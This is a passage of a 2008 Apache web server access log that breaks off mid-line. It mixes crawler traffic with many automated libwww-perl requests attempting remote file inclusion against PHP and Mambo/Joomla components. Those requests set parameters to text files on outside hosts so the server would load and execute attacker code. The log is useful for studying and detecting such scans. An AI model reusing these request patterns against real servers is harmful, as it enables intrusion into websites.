66.249.67.114 - - [09/Sep/2008:01:52:07 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.87.154.41 - - [09/Sep/2008:01:55:15 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
74.6.17.183 - - [09/Sep/2008:01:43:09 -0400] "GET /logs/access_log.Q108082200 HTTP/1.0" 200 4683251 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
121.135.142.207 - - [09/Sep/2008:01:55:54 -0400] "GET /logs/access_log.Q108080900//modules/TotalCalendar/about.php?inc_dir=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
216.146.70.18 - - [09/Sep/2008:01:56:53 -0400] "GET /logs/error_log.Q108080800/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 289 "-" "libwww-perl/5.76"
216.146.70.18 - - [09/Sep/2008:01:56:53 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.76"
216.146.70.18 - - [09/Sep/2008:01:56:53 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
216.146.70.18 - - [09/Sep/2008:01:56:53 -0400] "GET /logs/error_log.Q108062100/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 289 "-" "libwww-perl/5.76"
200.63.42.136 - - [09/Sep/2008:01:56:44 -0400] "GET /logs/access_log.Q108060400 HTTP/1.1" 200 4153792 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.146.70.18 - - [09/Sep/2008:01:57:00 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
67.19.87.58 - - [09/Sep/2008:01:57:08 -0400] "GET /logs/access_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
216.146.70.18 - - [09/Sep/2008:01:57:33 -0400] "GET /components/com_mambowiki/MamboLogin.php?IP=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.76"
62.97.194.235 - - [09/Sep/2008:01:57:43 -0400] "GET /errors.php?error=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.69"
62.97.194.235 - - [09/Sep/2008:01:57:43 -0400] "GET /logs/error_log.Q108052900/errors.php?error=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
62.97.194.235 - - [09/Sep/2008:01:57:43 -0400] "GET /logs/errors.php?error=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.69"
74.200.219.169 - - [09/Sep/2008:01:58:07 -0400] "GET /?path%5Bdocroot%5D=http://connect.idelco.com/langs/inv?? HTTP/1.1" 200 409 "-" "libwww-perl/5.814"
216.146.70.18 - - [09/Sep/2008:01:58:09 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.76"
74.200.219.169 - - [09/Sep/2008:01:58:07 -0400] "GET /logs/?path%5Bdocroot%5D=http://connect.idelco.com/langs/inv?? HTTP/1.1" 200 64934 "-" "libwww-perl/5.814"
74.200.219.169 - - [09/Sep/2008:01:58:10 -0400] "GET /logs/error_log.Q108082000/?path%5Bdocroot%5D=http://connect.idelco.com/langs/inv?? HTTP/1.1" 404 224 "-" "libwww-perl/5.814"
208.226.79.133 - - [09/Sep/2008:01:58:11 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
208.226.79.133 - - [09/Sep/2008:01:58:12 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
208.226.79.133 - - [09/Sep/2008:01:58:12 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
208.226.79.133 - - [09/Sep/2008:01:58:20 -0400] "GET /logs/error_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
209.59.12.99 - - [09/Sep/2008:01:59:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.135.142.207 - - [09/Sep/2008:02:00:55 -0400] "GET /logs/error_log.Q108082300/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:02:00:56 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_